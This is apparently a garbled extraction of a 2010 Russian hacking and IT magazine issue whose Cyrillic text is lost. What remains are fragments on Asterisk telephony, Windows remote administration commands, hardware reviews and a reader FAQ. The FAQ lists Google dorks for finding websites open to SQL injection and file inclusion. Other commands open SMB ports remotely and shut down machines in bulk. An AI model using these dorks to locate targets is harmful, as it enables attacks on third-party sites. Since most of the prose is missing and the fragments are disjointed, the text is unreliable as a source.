, , Asterisk
.
Asterisk CDR-
(Call Detail Record). CallerID, , , ,
, ,
. Asterisk
CSV-, CDR MySQL, PostgreSQL, unixODBC,
RADIUS. , CSV- MySQL ,
(
www.voip-info.org/wiki/view/
Asterisk+CDR+csv+mysql+import).
MySQL Asterisk . AddOns.
Asterisk
. Debian/Ubuntu :
$ sudo apt-get install asterisk-mysql
, ,
:
. ,
(),
, .
, ,
.

. Asterisk VoIP- .
, , .
$ mysql -uroot -p
mysql> CREATE DATABASE asterisk;
mysql> GRANT ALL PRIVILEGES ON asterisk.*
TO asteriskuser@localhost IDENTIFIED BY
'astpassw';
Asterisk cdr_mysql.txt ( Ubuntu

/usr/share/doc/asterisk-mysql).
CDR MySQL,
asterisk:
$ sudo nano /etc/asterisk/cdr_mysql.conf
[global]
hostname=localhost
dbname=asterisk
table=cdr
password=astpassw
user=asteriskcdruser
port=3306
X 03 /134/ 10
ASTERISK
sock=/tmp/mysql.sock

Asterisk:
$ asterisk -r
CLI> module load cdr_addon_mysql.so
,
cdr mysql
status. Aster isk,
/etc/aster isk/modules.conf
:
load = cdr_addon_mysql.so

Asterisk
System() .
, , Asterisk
. , ,
(, ,
:)).
. winexe (eol.ovh.
org/winexe) Windows NT/2k/XP/2k3.
Linux-, Asterisk,
:
exten => s,n,Read(auth||4||1|5)
exten => s,n,GotoIf($["${auth}" = "000"]?yes:no) ;
exten => s,n(yes),System(winexe -U <DOMAIN>/<user>%<password> //<host>
"c:\script.bat" >>/var/log/asterisk/win.log)
exten => s,n(no),Hangup()
, script.bat.
X 03 /134/ 10
,
. MySQL,
. :
;
exten => _X.,1,MYSQL(Connect
connid localhost asterisk astpassw
asterisk)
; , ( billsec ),
${resultid}
exten => _X.,2,MYSQL(Query resultid
${connid} SELECT SUM(billsec) FROM
cdr WHERE src=\'${CALLERID(num)}\')
; billing,
found 1,
exten => _X.,3,MYSQL(Fetch found

${resultid} billing)
;
exten => _X.,4,,MYSQL(Clear
${resultid})
; , ,

exten => _X.,5,GotoIf($["${found}" =
"1"]?true:false)
; ,
,
123
SYN/ACK
exten => _X.,6,GotoIf($["${billing}" <

""]?call:end)
exten => _X.,7,n(call),Dial()
exten => _X.,8,,MYSQL(Clear ${resultid})
exten => _X.,9,n,Hangup()
exten => _X.10,n(false),Playback(end)
exten => _X.1,n,Hangup()
; ,
,
MySQL
exten => h,1,MYSQL(Disconnect ${connid})
, SQL-. ,
123:
SELECT SUM(billsec) FROM àsterisk`.`cdr` WHERE
src='123'
, , . SQL- . ,
. ,
.
. SQL- , AGI-, .
CDR-. , Asterisk Queue/CDR Log Analyzer (www.micpc.com/qloganalyzer)
Asterisk-Stat (www.areski.net/asterisk-stat-v2).
Asterisk
, . , ,
. ,
, (speed dial), ,
, ,
2-3 . , :
exten => *01,1,Dial(SIP/_@${TRUNK},20)
, :
exten => lenok,1,Dial(SIP/server2/79101234567,20)
. - , . ,
, (
4232), (,
102030), (600000 ).
() 5
(300000 ) (60000
):
exten => _84232102030,1,Dial(SIP/8${EXTEN}@${OUTGOING},

,L[600000:300000:60000])
124
ASTERISK SIP
, .
(recall),
. Asterisk ,
.

*22, Callback *21.
[IncomingCall]
;
exten => _5XX,1,Set(_To=${EXTEN})
exten => _5XX,n,Set(_From=${CALLERID(num)})
; *22
exten => _5XX,n,Set(DB(${To}/LastCaller)=${From})
; *21
exten => _5XX,n,Set(DB(${From}/LastCalled)=${To})
;
exten => _5XX,n,Dial(SIP/${EXTEN},20)
exten => _5XX,n,Hangup()
; *22 ,
exten => *22,1,Set(tmp=${DB(${CALLERID(num)}/
LastCaller})
exten => *22,n,SayDigits(${tmp})
exten => *22,n,Dial(${tmp},1)
; *21
exten => *21,1,Set(tmp=${DB(${CALLERID(num)}/
LastCalled)})
exten => *21,n,SayDigits(${tmp})
exten => *21,n,Set(DB(${tmp}/
CallBack)=${CALLERID(num)})
exten => *21,n,Hangup()

(re-dial):
[default]
include => macro-recall
exten
exten
exten
exten
=> _X.,1,Macro(recall,${EXTEN})
=> *0,1,DBget(toCall=redial/${CALLERID})
=> *0,2,Macro(recall,${toCall})
=> *0,102,Hangup()
[macro-recall]
exten => s,1,DBput(redial/${CALLERID}=${ARG1})
exten => s,1,Dial(SIP/${ARG1},20)
exten => s,2,Goto(s-${DIALSTATUS},1)
exten => s-NOANSWER,1,Voicemail(u${ARG1})
X 03 /134/ 10
MAKE MENUSELECT APP_FAX

exten => sBUSY,1,Voicemail(b${ARG1})
exten => _s-.,1,Goto(s-NOANSWER,1)
, , ,
Asterisk.

(Call Parking)
(Call Pickup), Asterisk.
Call Parking ,
parkext parkpos
features.conf:
[general]
;
parkext => 700
;
parkpos => 701-720
, ,
(all
hold)
. Call Pickup
*8.

, e-mail!
, ,
, . : ,
. .
IP- (FoIP, Fax over
IP) : .37 T.38.

e-mail
.

. T.38 X 03 /134/ 10
.
VoIP-
,
: ,
, , ,
IP-,
(
). .38 ,
UDP, TCP
.
UDP,
.
VoIP G.711.
Asterisk .38
:
,
. Asterisk 1.4.20.1
T.38-
SIP-.
: RxFAX/
TxFAX, SendFAX/ReceiveFAX (
SpanDSP, soft-switch.org)
HylaFax + iaxmodem ( , .37).
asterisk-addons
SpanDSP,
G711-.
1.6.0
SpanDSP
( app_fax).
,
,

1.6.2. ,
T.38, Asterisk
G711 T.38. 2009
Digium Fax
For Asterisk (res_fax res_fax_digium, digium.
com/en/products/software/faxforasterisk.
php),
, IP.
,
( $38.50). 1.8
Asterisk
Fax For Asterisk (
), app_fax.
, ,
. ,
.
, ,
, , ,
Asterisk
SpanDSP. ( libtiff),
Asterisk --with-spandsp.
make menuselect
app_fax ( Applications). :
$ sudo asterisk -r
CLI>core show applications like fax
ReceiveFAX: Receive a FAX
SendFAX: Send a FAX
.
$ sudo nano /etc/asterisk/sip.conf
[general]
t38pt_udptl = yes
:
$ sudo nano /etc/asterisk/
extensions.conf
exten => _5,n,Dial(${TRUNK_SIP}/
,120,M(sendfax))
;
[macro-sendfax]
exten => _X.,1,Set(FAXFILE=//var/
spool/asterisk/fax/fax)
exten => _X.,n,SendFAX(${FAXFILE}.
tif)
exten => _X.,n,Hangup
;
[macro-receivefax]
exten => _X.,1,Answer()
exten => _X.,n,Wait(3)
exten =>
_X.,n,ReceiveFAX(faxfilename)
, Asterisk .
Asterisk,

, ,
. ,
,
. z
125
SYN/ACK
grinder grinder@synack.ru

WINDOWS
, , . ,
, , . .
!
,
WinNT,
.
, , , , Unix ,
.
-
, .
WSH (Windows
Script Host) PowerShell,
WinRS (Windows Remote Shell), MMC
(Microsoft Management Console), WMI (Windows Management
Instrumentation),

RDP (Remote Desktop Protocol).
,

,

, , , .
C
RDP ,
RDP,
,

, , , ,
.. Vista,
-
126
32 ,
,
(mstsc /span). RDP 7,
Win7/2k8R2, , , Aero,
Direct2D Direct3D .
RDP

Windows ( Windows CE Mobile),
Linux, xBSD, Mac OS X .
, rdesktop
(rdesktop.org)
Win2k8 (
Win2k8R2 ).
Linux rdesktop
Gnome-RDP KDE
Remote Desktop Client.
SeamlessRDP (www.cendio.com/seamlessrdp)

Linux Windows.

,
.
,
.

(
).

, .

. -
,
, ,
, .

Remote Assistance
( ).
,
.
, .
Terminal Server mode ,
.
Win2k8
RDP.
TS RemoteApp (
RemoteApp ) Terminal
Services Web Access ( RemoteApp

).
Win2k8.

RDP-,
( Win2k3SP1,
WinXPSP2 ).

. RDP
VPN,
Terminal Services Gateway.
X 03 /134/ 10
Win2k Microsoft Remote Command Service (Rcmd.exe).

Rcmdsvc.exe
10 , Rcmd.exe.
Win2k3 Administration Tools Pack,
3 , : ADMgmt.msc ( Active
Directory), PKMgmt.msc ( ), IPAddrMgmt.msc (IP, DHCP, DNS, WINS). Remote Administration
(HTML) IIS - ( 8098). Win2k8
Server Manager, ,
, ,
. ,
Server Manager Win2k8R2. MMC
Win2k8, ,
(RSAT,
Remote Server Administration Tools), Win2k8
. , RSAT
Vista/Win7, Microsoft. C
Vista/Win7
, Win2k3/2k8/2k8R2.
, MMC ,
. (Computer
Management) (Another Computer). , ,
Windows, . , SC
\\synack:
Management (WS-Management Protocol),

XML-.
WinRM WMI- ( ), . HTTP/HTTPS,

, . WinRM
2.0 5985/5986, 47001/TCP. 80/443.
,
, Kerberos ( CredSSP).
.
Win2k8R2 Win7 WinRM 2.0.
WinXPSP3/2k3SP2/VistaSP1/2k8/2k8SP2 Windows Management Framework Core
(Windows PowerShell 2.0, WinRM 2.0, BITS 4.0, support.microsoft.com/
kb/968929). .
WinRM ,
:
> winrm quickconfig
, WinRM , 5985/5986,
Windows Firewall. WinRM
80/443, :
> winrm set winrm/config/service @{EnableCompatibilityH
ttpListener="true"}
> winrm set winrm/config/service @{EnableCompatibilityH
ttpsListener="true"}
> SC \\synack query type= service state= all
(Task Scheduler) /s,

,
, .
WINRM
WinRM Vista/Win2k8 Microsoft- Web Services for
X 03 /134/ 10
c ,
winrm enumerate winrm/config/listener
winrm get winrm/config. , - WinRM, 80 , : , WinRM
/wsman, -
URL.

. -
127
SYN/ACK
INFO
info
PowerShell

PowerShell

,
2009 .
PowerShell 2.0

Win2k8R2
Win7.

RDP (
3389)
WinNT 4.0 Terminal
Server.
RDP-
Unix Xrdp
(xrdp.sf.net).

,

.

RDP
,
NAT,
UPnP.
RDP
6

,

0,

/console.
Terminal
Services Web Access

,

-,

-.
128
MMC

Windows
Windows (Computer Configuration Administrative
Templates Windows Components Windows Remote
Management). , WinRS
WinRM. , (Allow automatic
configuration of listeners) IP, .
TrustedHosts:
> winrm set winrm/config/client @
{TrustedHosts="synack"}
, , get:
> winrm get winrm/config/client
WinRS.
,
'-r',
:
> winrs -r:synack cmd.exe
> hostname
synack
> ipconfig
SSH-,

. WinRS cmd,
,
winrs help. ,
, cmd:

POWERSHELL
WinRM 2.0,
: -,
HTTP/HTTPS, SSL .. ,
PowerShell Remoting
(
), ,
. PowerShell-, , ,
PowerShell ,
get-help about_signing.
. :
PS C:\> Get-ExecutionPolicy
Restricted

, .
RemoteSigned:
PS C:\> Set-ExecutionPolicy RemoteSigned
.
, PowerShell:
PS C:\> Enable-PSRemoting

( '-Force' ).

WinRM ,
WF ( winrs quickconfig,
Set-WSManQuickConfig), HTTP
WS-Management IP- .
:
> winrs -r:synack "dir C:"

PS C:\> Disable-PSRemoting
HTTP,
HTTPS :

, , Test-WSMan:
> winrs -r:https://synack "tasklist"

PS C:\> Test-WSMan -ComputerName synack.ru\
POWERSHELL REMOTING
PowerShell 2.0
Remoting.
PS-
: .
X 03 /134/ 10
WINRM
, Enter-PSSession, PowerShell :
PS C:\> Enter-PSSession synack.ru
, ,
.
, exit Exit-PSSession.

,
Invoke-Command.
,
( , ). ,
:
HTTP://WWW
links
Windows Management
PS C:\> Invoke-Command -ComputerName synack.ru

-ScriptBlock {Get-Service | Format-List}

( ),
. 445 :
PS C:\> $portcommand = {netsh firewall set
portopening tcp 445 smb enable}
PS C:\> Invoke-Command -ComputerName synack.ru
-ScriptBlock $portcommand
Framework Core
WinXP/2k3/Vista/2008
support.microsoft.
com/kb/968929.
Sysinternal
technet.microsoft.
com/ru-ru/
sysinternals.
Microsoft Script
Center technet.
microsoft.com/ruru/scriptcenter.
, Netsh
, . set
machine 'r', WINS/UNC/
DNS IP-:
X 03 /134/ 10
129
SYN/ACK
WBEMTEST WMI
> netsh -r synack.ru -u
administrator -p password diag gui
HTML- ( , , ),
.
PSEXEC PsExec
,

.
Sysinternals PsTools (technet.
microsoft.com/ru-ru/sysinternals).
,
,
%path%
(, system32).
system32\
psexesvc.exe, PsExec
( ).
.
:
130
psexec \\computer -u user -p passwd

command
,
.
,
,
.
:
> psexec \\synack cmd.exe
, .
,
, PsExec .
Windows NTLM Kerberos.
,
,
, , :
> psexec @c:\systems.txt shutdown
/p /f
. , '-c'
.
'-i'
. PsExec
, , '-d':
> psexec -d \\sysack chkdsk

,
.

WINDOWS , WMI

.
, ,
WMI .
,

. ,
,
, ,
Win7, WinXP, ,
. X 03 /134/ 10
DCOM
NTLM Kerberos,
, .
WMI MMC-
DCOMCnfg DCOM-,
WMI wmimgmt.msc.
Windows Firewall WMI:
> netsh advfirewall firewall set rule group="windows
management instrumentation (wmi)" new enable=yes
, tasklist . :
tasklist /S <> /U
<>\<>
, , , :
> tasklist /S \\synack
WMI . ,
.
Wmic /node. ,
:
> wmic /node:synack /USER:"username" useraccount list
brief
,
PsExec,
.
:
> wmic /node:synack process list
> wmic /node:synack process where(id="679") call
terminate
X 03 /134/ 10
WMI
Windows. Wbemtest.exe, (Remote),
(\\synack\root\cimv2),
.
,
.
,
. , Windows Script Host, .Net

,
.
. z
131
SYN/ACK
NATHAN BINKERT NAT@SYNACK.RU

Cisco WS-C2960-48TT-L:
2-

Cisco WS-C2960-48TT-L
> :
Auto MDI/MDIX
IEEE 802.1p (Priority tags)
IEEE 802.1q (VLAN)
IEEE 802.1d (Spanning Tree)
IEEE 802.1s (Multiple Spanning Tree)
> / (Flash):
64 / 32
> :
48 x Ethernet 10/100 /
>> SYN/ACK
> Uplink-:
2 x Ethernet 10/100/1000 /
> :
: 13,6 /
: 10,1 /
> :
Web-
SNMP 1,
RMON, Telnet, SNMP
3, SNMP 2c, SSHv2
> :

: 45
> MAC-:
8192
> :

445 x 44 x 236
WS-C2960-48TT-L Cisco ,
.
.
, Cisco WS-C2960-48TT-L
48
. :
,
.

:
c ,
MAC-, ,
Private VLAN Edge
,
NAC (Network Admission Control),

. SPAN (Switch Port
Analyzer)

.
TACACS+
RADUIS.

(QoS Quality of
Service) 64 . IP-
, MAC-,
. ECR, SRR sheduling, WTD,
Strict Priority queuing,
,
132
(CIR) 8 /. QoS. ,
VoIP
QoS .
uplink-,
GigabitEtherChannel.
Cisco Cluster Management Suite
(CMS).
, SNMP 1,
RMON, Telnet, SNMP 3, SNMP 2c SSHv2.
Web-.

Cisco Network Assistant, .

Express Setup.

66 075 .
X 03 /134/ 10

1U-:
XServe Quad-Core Intel Xeon Apple

AppleXserve
> :
Quad-Core Intel Xeon 5500
Nehalem 2.26, 2.66 2.93
> :
12
6 ; 1, 2 4
> :
SATA SAS
Apple
3 , 1 7200 rpm
SATA
1.35 , 450
15000 rpm SAS
> RAID:
RAID-
Xserve RAID Card - 512
72 -
>> SYN/ACK
> :
2 Gigabit Ethernet
(10/100/1000BASE-T)
jumbo frames
750
,

> :
16-
PCI Express 2.0:
(6.6
) 9.25-
> -:
2 FireWire 800 (
15 )
2 USB 2.0
1 DB-9 serial
1 USB 2.0
> :
8x SuperDrive
(DVD+R DL/
DVDRW/CD-RW)
NVIDIA
GeForce GT 120 256 GDDR3 SDRAM;
Mini DisplayPort ( VGA
DVI )
4,4
44,7
76,2
14 ;
17,4 SATA
1
> :

> :
750

> :
, 1U
> : Mac OS X Server

10.5 Leopard ( )
,
? ,
Apple
, 1U-.
Xserve Quad-Core Intel Xeon ( ).

-
, .
Quad-Core Intel
Xeon 5500 Nehalem 2.26 .

, 2.26, 2.66
2.93 .
3 12 .
3 SATA- 1 (
SSD-). RAID-
- 512 .
Gigabit
Ethernet (10/100/1000BASE-T)
PCI Express 2.0 ( ).
Xserve , . -, Apple' FireWire
(IEEE 1394b). -, , ,
Mac OS X Server 10.5 Leopard

. -,
NVIDIA GeForce GT 120 256 , , ,
.
. Xserve EFI
(Extensible Firmware Interface)
BIOS, ,

. ,
Linux,
, Windows ,
Win2k8/Win2k8R2. - , 130 000
. z
X 03 /134/ 10
133
UNITS
lozovsky@gameland.ru
PSYCHO:
, - , , . ,

, , ,
.
? .
,
,
,
, .

,
, .

,
- ,
,
,
. , ,
, ? , -,

/. , ,
,
.
,
,
(

).
, , ,

. , ,
.
1. .
134
,
, :
( ,
, , ,
/,
).

, , ,
. ,
,
.
( ,
- ,

, ,
). ,
, ,
.
.
.
, XXI , ,

( :)),
.

.
,
,
- ,
.
, ; (
- )
(
70- :
).
2. . ,
, ,
(, , , )
(, ,
, MMPI) ,
,
. ,
-
, ,
,
? ,
.

, , , , ( )
. , . !
X 03 /134/ 10
aka
:

. ,

:

.
,
, ,
.
3. .
,

,
,
.
:

.

,
,
, ;
,
, ;
,

. ,

,
,

? ,
,
,
. ,

, ,
,
, , ,
(, , ).
, , ,
,
-
,
,
( +
)
(-, : +
, ). ,
,
. ,
- ,

,
,

:). .
(
) , ,
,

- , .

,
:

:
, ,
. ,
( , 23). ,
( 23 24, ).
X 03 /134/ 10

.
?
. ,
?

?.
(-) , ,

,
.
, ,
. ?
, ,

,

, .

,

- .
,

.
,

? :)
, ,

,
,
,
,
.
-, ,
:).

:
135
UNITS
vs. . !
-
.
- (, ,
: 100 ,
).
,
,
:).
- , ,
-.
()
. 6
( ,
). , 2- ,
, -

. ,
, ,
600-
(
), , :
,
(, )
(
);
;
,
(, , ,
, , , );

,
(
),

/,
, ,
136
,
..
,
( - ),

.
, . ,

,

.

,

.
,
, , ,
( ). (, )
, - ,
( , ,
, ,
). ,
?
( ) .
,
( ,
, ,
, ,
), .
, , ,
.
. , :
. ,
. -

,

, ,
-,
. ,

.
, - .
? !
? !
? ? ?
? , ,
? , !
. . ,
.
,
,
(, , , ),
,
.
,
, . ( ,
ID Software, !),
,
,
, : ,
, , - .
,
. -
,
. , , . ,
,
, ,
,
,
, . !.
X 03 /134/ 10
: .
!

( .pdb).
, , .
:)
:
1. .

. ,
,
, ,
,
.
2. ,
, , ( ,
),
(
), (-- !), ,
.
3. , .
, ,
,
:).
4. , , ,
, ,
,
,

( ).
5.
.
?

,

.
.

,
X 03 /134/ 10

() ,
.
,
,
-
, -

? , ,

(
, )

() , , , ,

.

,
,
( )

,
,
. ,
,
:)
.
, -
-
, ,

,
, ,

, , ,
.
. ,

,
: : ,
, VIP, , , , ,
100% ! :)
( ,
,
)

.

,

PSYCHO
. , ,
, :).
.
, .
,
()
,

.
, ,

.

.
.
,
,
, ,
,

, . , !
.
,
,
,
.
.
, , , -
.

?

,
. , ,
,
. ,
,

. ,
,
. ,

,

, ,
,

,
.

!,

.
.
,

. ,
-

,
:). . z
137
UNITS
faq
united
@real.xakep.ru
, - ?
? faq@real.xakep.ru
!
: 4G USB- Samsung SWC-U200 Mobile
WiMAX YOTA.
Q: .
CMS ?
A: , ,
-,
- .

( CMS
),

tutsplus.com.
1. WordPress
(wordpress.org; 116,000,000
powered by wordpress);
2. Drupal ,
whitehouse.gov
(drupal.com;
inurl:node/N,
N );
3. Joomla! (joomla.org; 22,000,000 );
4. ExpressionEngine ,

138
(www.expressionengine.com; 3,530,000 );
5. TextPattern (textpattern.com;
500k );
6. Radiant CMS ,
CMS (radiantcms.org; 400k );
7. Cushy CMS ,
HTML

(www.cushycms.com; 200k );
8. SilverStripe , -
WordPress (www.silverstripe.org; 160k
);
9. Alfresco JSP (www.
alfresco.com; 100k
);
10. TYPOlight (www.typolight.org; 100k
).
,
CMS ( ),

:).
P.S.
: php.
opensourcecms.com, cmslist.ru, cmsmatrix.
org Open Source
sourceforge.net.
Q: . jQuery
Prototype. ?
A:
jQuery
noconflict-mode. ,
, :
<html>
<head>
<script src="prototype.js"></
script>
<script src="jquery.js"></script>
<script>
jQuery.noConflict();
X 03 /134/ 10
// Use jQuery via jQuery(...)

jQuery(document).
ready(function(){
jQuery("div").hide();
});
// Use Prototype with $(...),
etc.
$('someid').hide();
</script>
</head>
<body></body>
</html>

jQuery http://
docs.jquery.com/Using_jQuery_with_Other_
Libraries.
Q: ,
milw0rm.com?
A: -
, explo.it
( www.exploit-db.com)
. ,
milw0rm.com,
:
Remote Exploits ( );
Local Exploits ( );
Web Applications ( -);
DoS/PoC ( );
Shellcode (-);
Papers ();
Search ();
D (
);
Submit ( );
Rss (
).

: securityfocus.com securitylab.ru.
Q: ,
.
A: ! (dorks),
:
1. SQL-:
inurl:".php?id="
inurl:".php?cat="
inurl:".php?catid="
inurl:".php?num="
inurl:".php?bid="
inurl:".php?pid="
inurl:".php?nid="
inurl:".php?avd="
inurl:".php?file="
2. Local File Inclusion/Remote File Inclusion:

inurl:".php?pagina="
X 03 /134/ 10
inurl:".php?inc="
inurl:".php?include_file="
inurl:".php?page="
inurl:".php?show="
inurl:".php?cat="
inurl:".php?file="
inurl:".php?path_local="
inurl:".php?phpbb_root_dir="
inurl:".php?path_pre="
inurl:".php?nic="
inurl:".php?sec="
inurl:".php?content="
inurl:".php?link="
inurl:".php?filename="
inurl:".php?dir="
inurl:".php?document="
inurl:".php?view="
inurl:".php?sel="
inurl:".php?locate="
inurl:".php?place="
inurl:".php?layout="
inurl:".php?go="
inurl:".php?catch="
inurl:".php?mode="
inurl:".php?name="
inurl:".php?loc="
inurl:".php?f="
inurl:".php?inf="
inurl:".php?pg="
inurl:".php?load="
inurl:".php?naam="

, :).
Q: WebMoney, ?
A: WebMoney .
:
1. . WebMoney ,
files.webmoney.ru.
,

.
2.
, ,
, , ,
-.
gamelot.ru.
3. Digiseller.ru,
-.
4. (Software
activation service) ,
.
www.softactivation.com/asp/about.
asp.
5. WM-,
.
: trust.webmoney.ru.
Q: , PHP
e-mail?
Q: , *nix- , touch.
?
A: , touch
(mtime)
,
. ,
touch ,
,
, ctime (Change
Time)
(, ,
, ..). ,

find
:
"find [] -ctime -1".
,
.
: www.krazyworks.
com/changing-time www.securiteam.com/
tools/5JP0H2K7FE.html.
P.S.
(Dm).
A:

:
<?php
//
$subject = ' ';
$message = ' ';
$from_name = ' ';
$from_mail = ' ';
$to = ' ';
$priority = 1; //, 1 3
//
$body = "$message\n";
$from = "$from_name <$from_mail>";
$headers = "Content-Type: text/
html; charset=windows-1251\n";
$headers .= "From: $from_mail\n";
$headers .= "X-Mailer: The Bat!
2005\n";
$headers .= "X-Priority:
$priority\n";
//
mail($to,$subject,$body,$headers);
?>
139
UNITS
Q: -
Q:
, open-source!
Yota ,
A: ,
A:
WiMax- Wi-Fi?

[Life]: http://forum.antichat.ru/thread169495.
html.
:
;
;
;
;
site.com/string;
subdomen.site.com.
, http://
tinyurl.com.
A:

:
BDDBot (www.twmacinta.com/bddbot)
, ,
,
;
Sphider (www.sphider.eu)
PHP,
-, MySQL;
OpenWebSpider (www.openwebspider.org)
, ,
.
Nutch (lucene.apache.org/nutch)
Java;
XQEngine (xqengine.sourceforge.net) , XML-.
Q: SMS-

, , ..
, .
,
.
, ,
: Yota,
,
Interbro KWI B2200 .
,
Yota (192.168.1.1),

192.168.1.254,
.
, , , admin/admin, ,
Wi-Fi,
Yota.
, , Wi-Fi (
),
.

,
.
.
. , ,
(
Q: JS (-).
, ,
). : -
, ?
, ,
A: , , -
- ?
,
, : http://mtt.ru/info/def/index.wbp.
DEF (910, 903 ..),
, , , . .
,

. :
XML-.
A: ,
Q:
- ,
OWASP (www.owasp.org),
,
.
OWASP ESAPI4JS (http://code.google.com/p/
owasp-esapi-js).
,
,
, ,
JS-.
, ESAPI4JS
.
Q: - Windows
,
?
A: , -,
Windows 7. :
: gpedit.msc;
User Configuration\
Administrative Templates\System;
System Run only;
Enable ,
Options, Show
List of allowed applications;
,

.
, , ,

, Applocker,
Windows 7.
Q: ,
.
0 , 1
, .. ,
SMS , -
Q: - .
. -
: ,
:).
\u4241\u2743\u0D22\u000A, , , \x41\
x42\x43\x27\x22\x0D\x0A\x00?
, ,
A: BETA3 (http://code.
google.com/p/beta3), -
, 16 , .
.
A: Asterisk (www.
asterisk.org).
,
. ,
IVR- (Interactive Voice Response),
,
, , .
20 ,

.
http://nag.
ru/news/17515. z
A: , . ,
,
: Unlocker Dr.Web
(www.drweb.com/unlocker/index) Deblocker
(support.kaspersky.
ru/viruses/deblocker). ,
SMS,

.
140
Q: - Google-,
.
X 03 /134/ 10
>Multimedia
AmoK Exif Sorter 2.56
Asynx Planetarium 2.61
Celestia 1.6.0
DeskScapes
doPDF 7.1.326
Girder 5.0.10
Graffiti Studio
IcoFX 1.6.4
INKSAVER 2.0
Juice 2.2
Miro 2.5.4
Photocopier 3.05
TipCam 2.2
VideoCacheView 1.53
>Misc
Blue Lock 1.92
Ceedo Personal 3.1.0.22
Dicto 3 Beta
DocList Uploader 1.1
Eastegger 5.6.0.536
google docs upload 1.3.1
MojoPac 2.0
Partition Find and Mount 2.31
Portable Start Menu 3.0
Stick 2.8.0.82
TheSages English Dictionary and
Thesaurus 3.1.2
ToDoList 6.0.8
VirtuaWin 4.1
WinMerge 2.12.4
4.5
>Games
Mario Forever 4.4
Scorched3D Version 43beta
Soldat 1.5
>>WINDOWS
>>Development
>Development
3rdRail 2.0
Aptana RadRails 2.0.2
Arachno Ruby IDE 0.7.13
Arcadia 0.8.0
Axure RP Pro 5.6
DreamCoder for MySQL 5.1
DreamCoder for Oracle 4.0
DreamCoder for PostgreSQL 2.0
FreeRIDE 0.9.6
haXe 2.05
IronRuby 1.0-rc1
Komodo Edit 5.2.4
qt4-qtruby 2.0.3
Ruby 1.9.1
Ruby DBI 0.4.3
Ruby In Steel Developer 2008 1.4
Ruby on Rails 2.3.4
Ruby-GNOME2 0.19.3
RubyGems 1.3.5
SlickEdit 2009
Treebeard XSLT IDE 0.9.5 Beta
TurboRuby 1.2
wxRuby 2.0.1
>>UNIX
>Desktop
aTunes 1.13.6
Audacious 2.2.0
Discwrapper 1.2.2
>System
Auslogics System Information 1.5.20
Boot-US 2.1.7
Crucial System Scanner
EASEUS Partition Master
Professional Giveaway 4.1.1
GhostWall FireWall 1.150
Kerio WinRoute Firewall 6.7.1
KeyScrambler Personal 2.6.0
muCommander 0.8.4
Pandora Recovery 2.1.1
Process Tamer 2.11.01
Returnil Virtual System 2010 Home
Free 3.1.7779
Sandboxie 3.42
TeraCopy 2.1
Unknown Device Identifier 7.00
Video Memory stress Test 1.7
What Changed 1.06
Wubi 9.100
>Security
BotHunter 1.5
Code Crawler 2.5.1
dirb 1.8
ESAPI for .Net 0.2
ESAPI for Java 2.0 rc4
ESAPI on Python 1.0
GMER 1.0.15
KeePass 2.09
ncrack 0.01
Nmap 5.21
OWASP ESAPI for PHP 1.0a
Scapy last
SecuBat v0.5
SpotAuditor 3.9.3
Technitium MAC Address Changer
5.0R3
The Dude 3.5
Windows File Analyzer 1.0.0
Wireshark 1.2.6
WITOOL 0.1
>Net
Deluge 1.2.0
digsby Build 75
Kiwi CatTools 3.4.0
Lastpass 1.64.4
Medieval Bluetooth Network
Scanner 1.4
Nemesis 1.4
OpenVPN 2.1.1
PrinterShare 2.1.2
SRWare Iron 4.0.280
Whisher for Windows 7.04
WirelessMon 3.1
. 3.0.3
VideoInspector 2.2.3.122
>Security
BotHunter 1.5.0
Chaosreader 0.94
>Net
Aria2 1.8.0
AsItHappens 0.57
Claws Mail 3.7.4
DCsharp 0.11.1
Deluge 1.2.0
Gajim 0.13.2
Mozilla Firefox 3.6
Netkit 2.7
NetworkManager 0.7.2
Opera 10.50
SABnzbd 0.4.12
SIM 0.9.4.3
Skype 2.1.0.81
Smuxi 0.7
Transmission 1.82
Twitux 0.69
Vacuum IM 1.0.0
WeeChat 0.3.1
Wicd 1.7
>Games
Danger from the deep 0.3.0
>Devel
Aptana Studio 2.0
Armadillo 0.8.2
Bazaar 2.0.4
BuildBot 0.7.12
Ceno 0.0.2
Clojure 1.1
Erlang R13B03
FreePascal 2.4
GCC 4.4.3
GHC 6.12.1
libxml2 2.7.6
NetBeans 6.8
OpenSwing 2.1.4
Poco 1.3.6p2
Premake 4.2
Ptex 2.0.0
Python 2.6.4
RabbitVCS 0.12.1
Selenium IDE 1.0.2
Subversion 1.6.9
Easystroke 0.4.11
EasyTag 2.1
Emelfm2 0.7.1
File Roller 2.24.3
Gimp 2.6.8
GNOME Do 0.8.2
Inkscape 0.47
Istanbul 0.2.2
LMMS 0.4.6
Metamorphose 1.1.2
Meteorite 0.10 Beta
QtiPlot 0.9.7.11
Unison 2.32.52
VLC 1.0.4
Wink 1.5
>X-Distr
BackTrack 4
Frenzy 1.2
>System
AMD Catalyst 10.1
AWStats 6.95
Bacula 5
Diskman 0.9.7
Gzip 1.4
Linux Bluetooth Remote Control
0.8.6
Linux Kernel 2.6.32.7
Lm-sensors 3.1.1
NTFS-3G 2010.01.16
NVClock 0.8
nVidia 190.53
PackageKit 0.6
QEMU 0.12.2
Rovclock 0.6e
Ubuntu Tweak 0.5
VirtualBox 3.1.2
Wine 1.1.37
>Server
ADCH++ 2.4
Apache 2.2.14
Apache Tomcat 6.0.24
BIND 9.6.1-P3
CUPS 1.4.2
DHCP 4.1.1
IMAPFilter 2.2.2
MySecureShell 1.15
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.6.5
PostgreSQL 8.4.2
Samba 3.4.5
Sendmail 8.14.4
Snort 2.8.5.2
Squid 3.0 STABLE21
Stunnel 4.30
Tinyproxy 1.8.0
Clamav sniffer 0.7

Dirb 2.03
Distributed Hash Cracker 3
Fakeroute 0.3
Fierce Domain Scan
Fimap 0.7 alpha
Firewalk 5.0
Ngrep 1.45
Nmap 5.21
Onesixtyone 0.3.2
Porkbind 1.3
PulledPork 0.3.4
SPIKE Proxy
SSLstrip 0.7
Tor 0.2.1.22
Tor-ramdisk
WAFP 0.01
Wireshark 1.2.6
Yasat 207
03(134) 2010
. 28
. 32
NT AUTHORITY \SYSTEM

WINDOWS
USERLEVEL!
03 (134) 2010

: 2
10
.

ASTERISK
. 119
. 48
. 94
KDE 4
. 54
7
KDE
TDL3:
! 660 . !
8.5
DVD
2100 .
175 . , 23% (230

. )
. ,
24
12
3720

+ + DVD:
- 155
( 35% , )
2100
!

,

,
:
+CD
Smoke
Total DVD+DVD
+DVD
DVDXpert
+2DVD
Digital Photo
11 46 2009

30

31

31
T3.

+2DVD
170 p.
PES
10

www.totalfootb
Ski Pass
Mountin Bike
ONBOARD
Total Football+DVD

!!!
